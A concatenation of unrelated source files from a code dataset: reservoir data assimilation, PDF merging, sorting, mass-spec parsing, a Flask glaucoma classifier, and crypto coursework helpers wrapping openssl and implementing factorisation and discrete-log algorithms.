Wei\r\n##------------------------------------------------------------------------------\r\n\r\nimport numpy as np\r\nimport scipy.ndimage.morphology as spndmo\r\nimport globalvariables as glb\r\nfrom matpinv import pinvmat\r\n\r\ndef ESMDALocalisation2(sg,sgporo,f,Sim1,alpha,c):\r\n\r\n print(' Loading the files ')\r\n ## Get the localization for all the wells\r\n\r\n A = np.zeros((120,60,5))\r\n for jj in range(5):\r\n A[13,24,jj] = 1\r\n A[37,38,jj] = 1\r\n A[95,22,jj] = 1\r\n A[66,40,jj] = 1\r\n A[29,54,jj] = 1\r\n A[57,17,jj] = 1\r\n A[89,5,jj] = 1\r\n A[100,38,jj] = 1\r\n\r\n print( ' Calculate the Euclidean distance function to the 6 producer wells')\r\n lf = np.reshape(A,(glb.Nx,glb.Ny,glb.Nz),'F')\r\n young = np.zeros((int(glb.totalgrids/glb.Nz),5))\r\n for j in range(5):\r\n sdf = lf[:,:,j]\r\n (usdf,IDX) = spndmo.distance_transform_edt(np.logical_not(sdf), return_indices = True)\r\n usdf = np.reshape(usdf,(int(glb.totalgrids/glb.Nz)),'F')\r\n young[:,j] = usdf\r\n\r\n sdfbig = np.reshape(young,(glb.totalgrids,1),'F')\r\n sdfbig1 = abs(sdfbig)\r\n z = sdfbig1\r\n ## the value of the range should be computed accurately.\r\n \r\n c0OIL1 = np.zeros((glb.totalgrids,1))\r\n \r\n print( ' Computing the Gaspari-Cohn coefficent')\r\n for i in range(glb.totalgrids):\r\n if ( 0 <= z[i,:] or z[i,:] <= c ):\r\n c0OIL1[i,:] = -0.25*(z[i,:]/c)**5 + 0.5*(z[i,:]/c)**4 + 0.625*(z[i,:]/c)**3 - (5.0/3.0)*(z[i,:]/c)**2 + 1\r\n\r\n elif ( z < 2*c ):\r\n c0OIL1[i,:] = (1.0/12.0)*(z[i,:]/c)**5 - 0.5*(z[i,:]/c)**4 + 0.625*(z[i,:]/c)**3 + (5.0/3.0)*(z[i,:]/c)**2 - 5*(z[i,:]/c) + 4 - (2.0/3.0)*(c/z[i,:])\r\n\r\n elif ( c <= z[i,:] or z[i,:] <= 2*c ):\r\n c0OIL1[i,:] = -5*(z[i,:]/c) + 4 -0.667*(c/z[i,:])\r\n\r\n else:\r\n c0OIL1[i,:] = 0\r\n \r\n c0OIL1[c0OIL1 < 0 ] = 0\r\n \r\n print(' Getting the Gaspari Cohn for Cyd') \r\n \r\n schur = c0OIL1\r\n Bsch = np.tile(schur,(1,glb.N))\r\n \r\n yoboschur = np.ones((glb.Np*glb.totalgrids + glb.No,glb.N))\r\n \r\n yoboschur[0:glb.totalgrids,0:glb.N] = Bsch\r\n yoboschur[glb.totalgrids:2*glb.totalgrids,0:glb.N] = Bsch\r\n\r\n sgsim11 = np.reshape(np.log(sg),(glb.totalgrids,glb.N),'F')\r\n sgsim11poro = np.reshape(sgporo,(glb.totalgrids,glb.N),'F')\r\n \r\n print(' Determining standard deviation of the data ')\r\n stddWOPR1 = 0.15*f[0]\r\n stddWOPR2 = 0.15*f[1]\r\n stddWOPR3 = 0.15*f[2]\r\n stddWOPR4 = 0.15*f[3]\r\n\r\n stddWWCT1 = 0.2*f[4]\r\n stddWWCT2 = 0.2*f[5]\r\n stddWWCT3 = 0.2*f[6]\r\n stddWWCT4 = 0.2*f[7]\r\n \r\n stddBHP1 = 0.1*f[8]\r\n stddBHP2 = 0.1*f[9]\r\n stddBHP3 = 0.1*f[10]\r\n stddBHP4 = 0.1*f[11]\r\n \r\n stddGORP1 = 0.15*f[12]\r\n stddGORP2 = 0.15*f[13]\r\n stddGORP3 = 0.15*f[14]\r\n stddGORP4 = 0.15*f[15]\r\n\r\n print(' Generating Gaussian noise ')\r\n Error1 = np.ones((glb.No,glb.N)) \r\n Error1[0,:] = np.random.normal(0,stddWOPR1,(glb.N))\r\n Error1[1,:] = np.random.normal(0,stddWOPR2,(glb.N))\r\n Error1[2,:] = np.random.normal(0,stddWOPR3,(glb.N))\r\n Error1[3,:] = np.random.normal(0,stddWOPR4,(glb.N))\r\n Error1[4,:] = np.random.normal(0,stddWWCT1,(glb.N))\r\n Error1[5,:] = np.random.normal(0,stddWWCT2,(glb.N))\r\n Error1[6,:] = np.random.normal(0,stddWWCT3,(glb.N))\r\n Error1[7,:] = np.random.normal(0,stddWWCT4,(glb.N))\r\n Error1[8,:] = np.random.normal(0,stddBHP1,(glb.N))\r\n Error1[9,:] = np.random.normal(0,stddBHP2,(glb.N))\r\n Error1[10,:] = np.random.normal(0,stddBHP3,(glb.N))\r\n Error1[11,:] = np.random.normal(0,stddBHP4,(glb.N))\r\n Error1[12,:] = np.random.normal(0,stddGORP1,(glb.N))\r\n Error1[13,:] = np.random.normal(0,stddGORP2,(glb.N))\r\n Error1[14,:] = np.random.normal(0,stddGORP3,(glb.N))\r\n Error1[15,:] = np.random.normal(0,stddGORP4,(glb.N))\r\n Error1[16,:] = np.random.normal(0,0.062265,(glb.N))\r\n\r\n Cd2 = (Error1.dot(Error1.T))/(glb.N - 1)\r\n\r\n Dj = np.zeros((glb.No, glb.N))\r\n for j in range(glb.N):\r\n Dj[:,j] = f + Error1[:,j]\r\n\r\n print(' Generating the ensemble state matrix with parameters and states ')\r\n overall = np.zeros((glb.Np*glb.totalgrids + glb.No,glb.N))\r\n\r\n\r\n overall[0:glb.totalgrids,0:glb.N] = sgsim11\r\n overall[glb.totalgrids:2*glb.totalgrids,0:glb.N] = sgsim11poro\r\n overall[glb.Np*glb.totalgrids:glb.Np*glb.totalgrids + glb.No,0:glb.N] = Sim1\r\n\r\n Y = overall\r\n\r\n M = np.mean(Sim1, axis = 1)\r\n M2 = np.mean(overall, axis = 1)\r\n\r\n S = np.zeros((Sim1.shape[0],glb.N))\r\n yprime = np.zeros(((glb.Np)*glb.totalgrids + glb.No,glb.N))\r\n \r\n for j in range(glb.N):\r\n S[:,j] = Sim1[:,j]- M\r\n yprime[:,j] = overall[:,j] - M2\r\n\r\n print (' Updating the new ensemble')\r\n Cyd = (yprime.dot(S.T))/(glb.N - 1)\r\n Cdd = (S.dot(S.T))/(glb.N - 1)\r\n\r\n\r\n## print (' Rescaling the denominator matrix')\r\n## Ri = np.array(splg.lapack.dpotrf(alpha*Cd2))\r\n## Rii = Ri[0]\r\n## Rii = np.reshape(Rii,(Rii.size,1),'F')\r\n## for i in range(Rii.size):\r\n## if Rii[i] != 0:\r\n## Rii[i] = Rii[i]**-1\r\n##\r\n## Ri = np.reshape(Rii,(Ri[0].shape),'F')\r\n## Ctilde = ((Ri**-1).dot(Cdd.dot((Ri**(-1)).T))) + np.ones(Sim1.shape)\r\n##\r\n## \r\n## Usigt,Sigt,Vsigt = np.linalg.svd(Ctilde, full_matrices = False)\r\n## xsmall = np.diag(Sigt)\r\n## Bsigt = np.cumsum(xsmallt, axis = 0) # vertically addition\r\n## valuesigt = Bsigt[-1] # last element\r\n## valuesigt = valuesigt * 0.9999\r\n## indicest = ( Bsigt >= valuesigt ).ravel().nonzero()\r\n## toluset = xsmallt[indicest]\r\n## tol = toluset[0]\r\n\r\n Usig,Sig,Vsig = np.linalg.svd((Cdd + (alpha*Cd2)), full_matrices = False)\r\n Bsig = np.cumsum(Sig, axis = 0) # vertically addition\r\n valuesig = Bsig[-1] # last element\r\n valuesig = valuesig * 0.9999\r\n indices = ( Bsig >= valuesig ).ravel().nonzero()\r\n toluse = Sig[indices]\r\n tol = toluse[0]\r\n\r\n\r\n\r\n print(' Update the new ensemble ')\r\n (V,X,U) = pinvmat((Cdd + (alpha*Cd2)),tol)\r\n \r\n Ynew = Y + yoboschur*((Cyd.dot(X)).dot(Dj - Sim1))\r\n\r\n print(' Extracting the active permeability fields ')\r\n value1 = Ynew[0:glb.totalgrids,0:glb.N]\r\n\r\n DupdateK = np.exp(value1)\r\n\r\n sgsim2 = Ynew[glb.totalgrids:glb.totalgrids*2,0:glb.N]\r\n\r\n return (sgsim2,DupdateK)\r\n{\"mode\":\"full\",\"isActive\":false}\r\n","sub_path":"SPE10 Python/ES-MDA Covariance Localisation Python/ESMDA_localisation2.py","file_name":"ESMDA_localisation2.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"450350070","text":"import time\n\nimport PyPDF2\nimport re\nimport os\ndef merge_pdf(name):\n '''\n 合并 pdf\n '''\n print('正在合并最终 pdf')\n # find all the pdf files in current directory.\n mypath = os.getcwd()\n pattern = r\"\\.pdf$\"\n file_names_lst = [mypath + \"\\\\\" + f for f in os.listdir(mypath) if re.search(pattern, f, re.IGNORECASE)\n and not re.search(name+'.pdf', f)]\n\n # 对文件路径按页码排序\n dic = {}\n for i in range(len(file_names_lst)):\n page = re.findall(r'(\\d+)\\.pdf', file_names_lst[i])[0]\n dic[int(page)] = file_names_lst[i]\n file_names_lst = sorted(dic.items(), key=lambda x: x[0])\n file_names_lst = [file[1] for file in file_names_lst]\n\n # merge the file.\n opened_file = [open(file_name, 'rb') for file_name in file_names_lst]\n pdfFM = PyPDF2.PdfFileMerger()\n for file in opened_file:\n # print('写入了{}.pdf'.format(file))\n pdfFM.append(file)\n\n # output the file.\n start= time.time()\n with open(mypath + \"\\\\\" + name + \".pdf\", 'wb') as write_out_file:\n pdfFM.write(write_out_file)\n end= time.time()\n print(end-start)\n # close all the input files.\n for file in opened_file:\n file.close()\n\n print('合并完成 %s' % name)\n\nif __name__=='__main__':\n merge_pdf('从零开始')","sub_path":"书香清华/Python从零开始学/composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"593235648","text":"def merge_sort(lst):\r\n \"\"\"Preform merge sorting on a list.\"\"\"\r\n if len(lst) > 1:\r\n mid = len(lst) // 2\r\n left = lst[:mid]\r\n right = lst[mid:]\r\n\r\n merge_sort(left)\r\n merge_sort(right)\r\n\r\n left_idx = 0\r\n right_idx = 0\r\n lst_idx = 0\r\n\r\n while left_idx < len(left) and right_idx < len(right):\r\n if left[left_idx] < right[right_idx]:\r\n lst[lst_idx] = left[left_idx]\r\n left_idx += 1\r\n else:\r\n lst[lst_idx] = right[right_idx]\r\n right_idx += 1\r\n lst_idx += 1\r\n\r\n while left_idx < len(left):\r\n lst[lst_idx] = left[left_idx]\r\n left_idx += 1\r\n lst_idx += 1\r\n \r\n while right_idx < len(right):\r\n lst[lst_idx] = right[right_idx]\r\n right_idx += 1\r\n lst_idx += 1\r\n \r\n\r\n","sub_path":"src/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"537293894","text":"#!/usr/bin/env python\nimport os \nimport sys\n\nfilename_mzXML = sys.argv[1]\n \nscan_id = 0\nscan_info = dict()\nf_mzXML = open(filename_mzXML,'r')\nfor line in f_mzXML:\n line = line.strip().rstrip('>')\n if( line.startswith('')[0]\n if( tmp.startswith('precursorScanNum') ):\n tmp_precursor_id = int(tmp.replace('\"','').split('=')[1])\n scan_info[scan_id]['precursor_id'] = tmp_precursor_id\n scan_info[tmp_precursor_id]['ms2_count'] += 1\n if( tmp.startswith('precursorCharge') ):\n scan_info[scan_id]['precursor_charge'] = int(tmp.replace('\"','').split('=')[1])\n scan_info[scan_id]['precursor_mz'] = float(line.split('>')[1].split('<')[0])\nf_mzXML.close()\n\n## Some mzXML do not have precirsorScanNum\nms1_id = 0\nfor tmp_scan_id in sorted(scan_info.keys()):\n if( scan_info[tmp_scan_id]['msLevel'] == 1 ):\n ms1_id = tmp_scan_id\n else:\n scan_info[ms1_id]['ms2_count'] += 1\n scan_info[tmp_scan_id]['precursor_id'] = ms1_id\n\ndef get_param(args, keyword):\n if( args.has_key(keyword) ):\n return args[keyword]\n return 0.0\n\nf_ms1 = open('%s.ms1_info'%filename_mzXML,'w')\nf_ms2 = open('%s.ms2_info'%filename_mzXML,'w')\nf_ms1.write('#ScanID\\tRetTime\\tCountMS2\\tTotIon\\n')\nf_ms2.write('#ScanID\\tRetTime\\tPrecursorID\\tPrecursorCharge\\tPrecursorMz\\tTotIon\\n')\nfor tmp_scan_id in sorted(scan_info.keys()):\n tmp = scan_info[tmp_scan_id]\n if( tmp['msLevel'] == 1 ):\n f_ms1.write('%05d\\t%.4f\\t%d\\t%d\\n'%(tmp_scan_id, tmp['ret_time'], tmp['ms2_count'], tmp['tot_ion']))\n if( tmp['msLevel'] == 2 ):\n tmp_ret_time = get_param(tmp, 'ret_time')\n tmp_precursor_charge = get_param(tmp, 'precursor_charge')\n tmp_precursor_id = get_param(tmp, 'precursor_id')\n tmp_precursor_mz = get_param(tmp, 'precursor_mz')\n tmp_tot_ion = get_param(tmp, 'tot_ion')\n f_ms2.write('%05d\\t%.4f\\t%05d\\t%d\\t%.5f\\t%.2f\\n'%(tmp_scan_id, tmp_ret_time, tmp_precursor_id, tmp_precursor_charge,tmp_precursor_mz,tmp_tot_ion))\nf_ms1.close()\nf_ms2.close()\n","sub_path":"raw/mzXML-to-ms1ms2_info.py","file_name":"mzXML-to-ms1ms2_info.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"13503149","text":"import os\nimport base64\nimport numpy as np\nimport io\nfrom PIL import Image\nfrom keras import backend as K\nfrom skimage.measure import label,regionprops\nimport cv2\nfrom skimage.transform import resize\nfrom skimage.io import imsave\nfrom keras.models import Model, load_model\nfrom skimage.exposure import equalize_adapthist\n\nfrom flask import Flask, url_for, redirect, render_template, request, jsonify\nfrom werkzeug import secure_filename\n\nUPLOAD_FOLDER = 'C:/Users/ashi agarwal/Documents/Flask_apps/DeepEye/static/Images'\n\napp=Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp = Flask(__name__)\n\ndef get_od_model():\n global modelod\n modelod = load_model('Rimone_128.hdf5',custom_objects={'dice_coef':dice_coef,'iu':iu,'iouLoss':iouLoss,'acc':acc,'IOU':IOU})\n print('*OD Model loaded!!')\ndef get_oc_model():\n global modeloc\n modeloc = load_model('RIMONE_OC_model-ep027-loss0.389-val_loss0.394.hdf5',custom_objects={'dice_coef':dice_coef,'iu':iu,'iouLoss':iouLoss,'acc':acc,'IOU':IOU})\n print('*OC Model loaded!!')\n#def get_class_model():\n # global model\n # model = load_model('Rimone_128.hdf5')\n # print('*OD Model loaded!!')\ndef preprocessOD():\n global image\n image=equalize_adapthist(np.array(Image.open('./static/Images/input.jpg').resize([128,128],Image.BICUBIC)))\n image=image.reshape([1,128,128,3])\n image/=np.max(image)\n image-=np.mean(image)\n image/=np.std(image)\n return image\ndef preprocessOC(image1):\n global mir,mic,mar,mac\n im=image1\n li=label(im+0.5)\n region=regionprops(li)\n mir,mic,mar,mac=region[0].bbox\n cx=image[0,mir:mar,mic:mac,:]\n c_x=cv2.resize(cx,(128,128),interpolation=cv2.INTER_AREA)\n c_x=c_x.reshape([1,128,128,3])\n return c_x\ndef dice_coef(y_true, y_pred):\n intersection = K.sum(y_true * y_pred)\n return (2. * intersection + 1) / (K.sum(y_true) + K.sum(y_pred) + 1)\n#%%\ndef iu(y_true, y_pred):\n a2=K.sum(y_true*y_true)\n b2=K.sum(y_pred*y_pred)\n iu=K.sum(y_true*y_pred)/(a2+b2-K.sum(y_true*y_pred))\n return iu\n#%%\ndef iouLoss(y_true, y_pred):\n return-K.log(iu(y_true,y_pred))\n#%%\ndef acc(y_true, y_pred):\n TP = K.sum(y_true * y_pred)\n FP=K.sum((K.max(y_true)-y_true) * y_pred)\n return (TP)/(TP+FP)\n\n#%%\ndef IOU(y_true, y_pred):\n intersection = K.sum(y_true * y_pred)\n union=K.sum((y_true+y_pred)/2)\n iou=intersection/union\n return iou\n\nprint(\"* Loading OD segmentation Model\")\nget_od_model()\nprint(\"* Loading OC segmentation Model\")\nget_oc_model()\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n@app.route(\"/instruction\")\ndef instruction():\n return render_template(\"instructions.html\")\n\n@app.route(\"/projectDiscription\")\ndef pro_dis():\n return render_template(\"projectDes.html\")\n\n@app.route(\"/tool\")\ndef tool():\n\treturn render_template(\"tool.html\")\n\n@app.after_request\ndef add_header(response):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n response.headers['Cache-Control'] = 'public, max-age=0'\n return response\n\n@app.route(\"/upload\",methods=['POST'])\ndef upload():\n\tif request.method == 'POST':\n\t\tfile = request.files['file']\n\t\tfilename = secure_filename(file.filename)\n\t\tos.remove('./static/Images/input.jpg')\n\t\tfile.save('static/Images/input.jpg')\n\t #return redirect(url_for('uploaded_file',filename=filename))\n\t #return render_template(\"tool.html\")\n\treturn redirect(url_for('tool'))\n\n@app.route(\"/preidct\")\ndef predict():\n im1=preprocessOD()\n y_od=modelod.predict(im1, verbose=1)\n y_od=y_od.reshape([128,128])\n os.remove('./static/Images/od.jpg')\n imsave('./static/Images/od.jpg', y_od)\n im2=preprocessOC(y_od)\n y_oc=modeloc.predict(im2, verbose=1)\n y_oc=y_oc.reshape([128,128])\n oc_pred=np.zeros([128,128],dtype='float32')\n cx=cv2.resize(y_oc,((mac-mic),(mar-mir)),interpolation=cv2.INTER_AREA)\n oc_pred[mir:mar,mic:mac]=cx\n os.remove('./static/Images/oc.jpg')\n imsave('./static/Images/oc.jpg', oc_pred)\n li1=label(y_od+0.5)\n li2=label(oc_pred+0.5)\n region1=regionprops(li1)\n region2=regionprops(li2)\n mir1,mic1,mar1,mac1=region1[0].bbox\n mir2,mic2,mar2,mac2=region2[0].bbox\n OD_Diam=mac1-mic1\n OC_Diam=mac2-mic2\n CDR=OC_Diam/OD_Diam\n print(CDR)\n g_h= 1 if CDR>0.5 else 0\n if (g_h):\n response={'prediction': '*** GLAUCOMATIC!!! ***'}\n print(' *** GLAUCOMATIC!!! ***')\n else:\n response={'prediction': '*** HEALTHY!!! ***'}\n print(' *** HEALTHY!!! ***')\n\n return redirect(url_for('tool'))\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"284032066","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . import views\n\napp_name = 'schedule'\n\nurlpatterns = [\n url(r'^$', views.dashboard, name=\"dashboard\"),\n url(r'^add-schedule/$', views.addSchedule, name=\"add-schedule\"),\n url(r'^update-schedule/(?P[0-9])/$', views.updateSchedule, name=\"update-schedule\"),\n url(r'^delete-schedule/(?P[0-9])/$', views.deleteSchedule, name=\"delete-schedule\"),\n url(r'^mark/(?P[0-9])/(?P[0-9])$', views.mark, name=\"mark\"),\n]\n","sub_path":"schedule/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"626185279","text":"# coding=utf-8\nfrom unittest import TestCase\nfrom schematics.models import Model\nfrom schematics.types import StringType\nfrom schematics.types.compound import PolymorphicType\n\n\nclass Parent(Model):\n model_type = StringType(required=True)\n\n\nclass Person(Parent):\n name = StringType()\n\n\nclass Item(Parent):\n description = StringType()\n\n\nclass Container(Model):\n obj = PolymorphicType(type_attr_map={\n 'I': Item,\n 'P': Person\n }, attr_name='model_type')\n\n\nclass SchematicsSubclassTypeTests(TestCase):\n def test_serializes_into_heterogenous_types(self):\n c = Container(**{\n 'obj': {\n 'model_type': 'I',\n 'description': 'test description'\n }\n })\n\n self.assertEqual(c.obj.description, 'test description')\n\n c2 = Container(**{\n 'obj': {\n 'model_type': 'P',\n 'name': 'test name'\n }\n })\n\n self.assertEqual(c2.obj.name, 'test name')","sub_path":"tests/test_polymorphic_type.py","file_name":"test_polymorphic_type.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"197171912","text":"import subprocess\nimport base64\nimport json\nfrom hashlib import sha256\nimport sympy #https://docs.sympy.org/latest/modules/ntheory.html\nimport math\nimport gmpy2\nfrom Crypto.PublicKey import DSA\n\n# in case of problem, this exception is raised\nclass OpensslError(Exception):\n pass\n\n\ndef encrypt(plaintext, passphrase, cipher='aes-128-cbc'):\n \"\"\"invoke the OpenSSL library (though the openssl executable which must be\n present on your system) to encrypt content using a symmetric cipher.\n\n The passphrase is an str object (a unicode string)\n The plaintext is str() or bytes()\n The output is bytes()\n\n # encryption use\n >>> message = \"texte avec caractères accentués\"\n >>> c = encrypt(message, 'foobar')\n \n \"\"\"\n \n # prepare arguments to send to openssl\n pass_arg = 'pass:{0}'.format(passphrase)\n args = ['openssl', 'enc', '-' + cipher, '-base64', '-pass', pass_arg, '-pbkdf2']\n \n #if the clear message is a unicode string, we have to encode it in bytes() \n # to be able to send it in the pipeline to openssl\n if isinstance(plaintext, str):\n plaintext = plaintext.encode('utf-8')\n\n # # send the plaintext in the stdin of openssl, recover stdout and stderr\n # To print the invoked command\n # print('debug : {0}'.format(' '.join(args)))\n result = subprocess.run(args, input=plaintext, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n # if an error message is present on stderr, we stop\n # attention, in stderr we recover bytes(), so we have to convert\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n # OK, openssl sent the cipher in stdout, in base64.\n # We recover bytes, we have to conert it in an unicode string\n return result.stdout.decode()\n\n\ndef decrypt(ciphertext, passphrase, cipher='aes-128-cbc'):\n \n pass_arg = 'pass:{0}'.format(passphrase)\n args = ['openssl', 'enc', '-d', '-' + cipher, '-base64', '-pass', pass_arg, '-pbkdf2']\n \n if isinstance(ciphertext, str):\n ciphertext = ciphertext.encode('utf-8')\n\n result = subprocess.run(args, input=ciphertext, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return result.stdout.decode()\n\ndef pkeyencrypt(filetext, keyfile, isFiletext):\n \"\"\"invoke the OpenSSL library (though the openssl executable which must be\n present on your system) to encrypt content using an asymmetric cipher with public key.\n\n The plaintext is str() or bytes()\n The key is a file that contains the public key (in base64)\n isFiletext is a bool to know if filetext is a file that contains the key or a string\n The output is bytes()\n\n # encryption use\n >>> message = mdg.txt\n >>> key = \"./key.txt\"\n >>> c = encrypt(msg.txt, key, true)\n \n \"\"\"\n \n if isFiletext :\n with open(filetext) as f:\n plaintext = f.read()\n f.closed\n \n else :\n plaintext=filetext\n \n args = ['openssl', 'pkeyutl', '-encrypt', '-pubin', '-inkey', keyfile]\n \n if isinstance(plaintext, str):\n plaintext = plaintext.encode('utf-8')\n \n result = subprocess.run(args, input=plaintext, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return base64.b64encode(result.stdout).decode()\n\n\ndef pkeydecrypt(filetext, keyfile, isFiletext):\n \"\"\"invoke the OpenSSL library (though the openssl executable which must be\n present on your system) to decrypt content using an asymmetric cipher with private key.\n\n The ciphertext is in base64\n The key is a file that contains the private key (in base64)\n isFiletext is a bool to know if filetext is a file that contains the key or a string\n The output is bytes()\n\n # encryption use\n >>> message = msg.txt\n >>> key = \"./key.txt\"\n >>> c =decrypt(msg.txt, key, true)\n \n \"\"\"\n \n if isFiletext :\n with open(filetext) as f:\n ciphertext = f.read()\n f.closed\n else :\n ciphertext=filetext\n\n args = ['openssl', 'pkeyutl', '-decrypt', '-inkey', keyfile]\n\n ciphertext = base64.b64decode(ciphertext)\n \n result = subprocess.run(args, input=ciphertext, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return result.stdout.decode()\n\n\ndef hybrid(filetext, keyfile, passphrase):\n \"\"\" cipher a message using the hybrid method\n invoke the encrypt method to encrypt the message with passphrase\n then invoke the pkeyencrypt function to encrypt the passphrase with the\n public key contained in keyfile.\n \n filetext is the message in plain text\n keyfile is the public key in base64\n passphrase is in ascii\n \n the output is a serialized dictionary in JSON\n \"\"\"\n \n with open(filetext) as f:\n plaintext = f.read()\n f.closed\n\n passphrase=passphrase.encode()\n \n try :\n ciphertext=encrypt(plaintext, passphrase)\n except OpensslError :\n raise\n \n try :\n passphrase=pkeyencrypt(passphrase, keyfile, False)\n except OpensslError :\n raise\n \n dict={\"session_key\" : passphrase, \"payload\" : ciphertext}\n \n return json.dumps(dict)\n\ndef hybridDecrypt(file_enc, keyfile):\n \"\"\" Decrypt a dictionary serialized in json and encrypted with the hybrid method\n file_enc.txt is the dictionary serialized in json\n keyfile is the private key of the user\n \n the output is the plaintext\n \"\"\"\n \n with open(file_enc) as f:\n dic = f.read()\n f.closed\n\n dic = json.loads(dic)\n \n try :\n passphrase = pkeydecrypt(dic[\"session_key\"].encode(), keyfile, False)\n except OpensslError :\n raise\n \n return decrypt(dic[\"payload\"], passphrase)\n\n\ndef myhash(doc) :\n \"\"\"Hash the content of a file with sha256\"\"\"\n with open(doc) as f:\n plaintext = f.read()\n f.closed\n\n result=sha256(plaintext.encode())\n return result.hexdigest()\n\n\ndef sign(doc, filekey) :\n \"\"\"Sign the content of a file invoking openssl\n @param doc : The file to sign\n @param filekey : file containing the key\n \"\"\"\n\n args = ['openssl', 'dgst', '-sign', filekey,'-sha256', doc]\n\n result = subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return base64.b64encode(result.stdout).decode()\n\n\ndef sign2(msg, filekey) :\n \"\"\"Sign a message invoking openssl\n @param msg : The message to sign\n @param filekey : file containing the key\n \"\"\"\n\n args = ['openssl', 'dgst', '-sign', filekey,'-sha256']\n\n result = subprocess.run(args, input=msg.encode(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return base64.b64encode(result.stdout).decode()\n\n\ndef verify_sign(filekey, signature, msg) :\n \"\"\"Verify a Signature of a message invoking openssl\n @param filekey : file containing the key\n @param signature : signature to verify\n @param msg : The message that was signed\n \"\"\"\n \n with open('/tmp/sign.txt', 'wb') as f :\n f.write(base64.b64decode(signature))\n \n args = ['openssl', 'dgst', '-sha256', '-verify', filekey, '-signature', '/tmp/sign.txt']\n\n result = subprocess.run(args, input=msg.encode(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n error_message = result.stderr.decode()\n if error_message != '':\n raise OpensslError(error_message)\n\n return result.stdout.decode()=='Verified OK\\n'\n \n\ndef hexdeugtoint(hexdeg, isFile) :\n \"\"\"Convert an hexa number returning by openssl in string with some ':' to int\"\"\"\n if isFile:\n with open(hexdeg) as f:\n texthex = f.read()\n f.closed\n else :\n texthex=hexdeg\n\n strhex=\"\"\n for c in texthex :\n if(c!=':' and c!='\\n') :\n strhex+=c\n \n return int(strhex, base=16)\n\n\ndef pollardrho(n):\n \"\"\"Factorization of a decomposable integer using the rho pollard method\"\"\"\n f = lambda z: z*z+1\n x, y, d = 2, 2, 1\n while d==1:\n x = f(x) % n\n y = f(f(y)) % n\n d = math.gcd(x-y, n)\n return d\n\n\ndef euclideE(a,N):\n \"return the modular inverse of a mod N : c like a*c=1 mod N\"\n r0, r1 = a, N\n u0, u1 = 1, 0\n v0, v1 = 0, 1\n while(not(r1==0)):\n q = int(r0//r1)\n r, u, v = r1, u1, v1\n r1 = r0 - q * r1\n u1 = u0 - q * u1\n v1 = v0 - q * v1\n r0, u0, v0= r, u, v\n if (r0 == 1): \n return u0%N\n raise ValueError('the number is not inversible')\n\n\n\ndef integralPowerOf2(z) :\n \"\"\"is z a integral power of 2?\"\"\"\n return (z & (z-1))==0\n\ndef brentWithBatchGCD(N):\n \"\"\" Find the cycle of pollard rho with brent method applaying the batch gcd :\n instead of computing gcd(xi-xm) in all iterations, wait the cpt-th iteration\n and compute gcd of (x0-x1)...(xcpt-1 - xcpt) with N.\n \"\"\"\n xi=1\n xm=1\n s=1\n cpt=0\n i=1\n while True :\n #print(i)\n cpt+=1\n xi=(xi*xi + 1) % N # f(x) = x^2 + c (pas de bébé)\n # normaly,s = math.gcd(xi-xm, N), we accumulate cpt values of xi-xm then compute the gcd\n s = (s*(xi-xm)) % N # f(f(y)) -> pas de géant\n if cpt==10 :\n s=math.gcd(s, N) # we compute gcd of accumulated values\n if s!= 1 and s != N : # (x=y) ?\n print(s)\n return s, N//s\n s=1\n cpt=0\n if integralPowerOf2(i) :\n xm=xi\n print(i)\n i+=1\n\ndef brentMultipleFactors(N) :\n \"\"\" Find all the prime factors of N (more than 2) by the brent's cycle finding with batch gcd\n \"\"\"\n res=[]\n facts=0,0\n while(not(gmpy2.is_prime(facts[1]))) :\n facts=brentWithBatchGCD(N)\n res+=[facts[0]]\n N=facts[1]\n res+=[facts[1]]\n return res\n\n \ndef pollard_p1(N, B, maxB=1) :\n \"\"\"Factorize N with pollard's p-1 method with p-1 1e7 smooth\"\"\"\n B=int(B)\n maxB=int(maxB)\n if maxB>> h : element of the group\n >>> g : generator of the group\n >>> p : the modulus\n >>> out : x such that h = g^x mod p\n \"\"\"\n print('Running Shanks algorithm')\n hashtable={}\n T=int(math.sqrt(p)/2)+1\n S=pow(g, -T, p)\n u, i = h, 0\n while True :\n if u in hashtable :\n return i*T+hashtable[u]\n hashtable[u]=i\n u=(u*S) % p\n raise 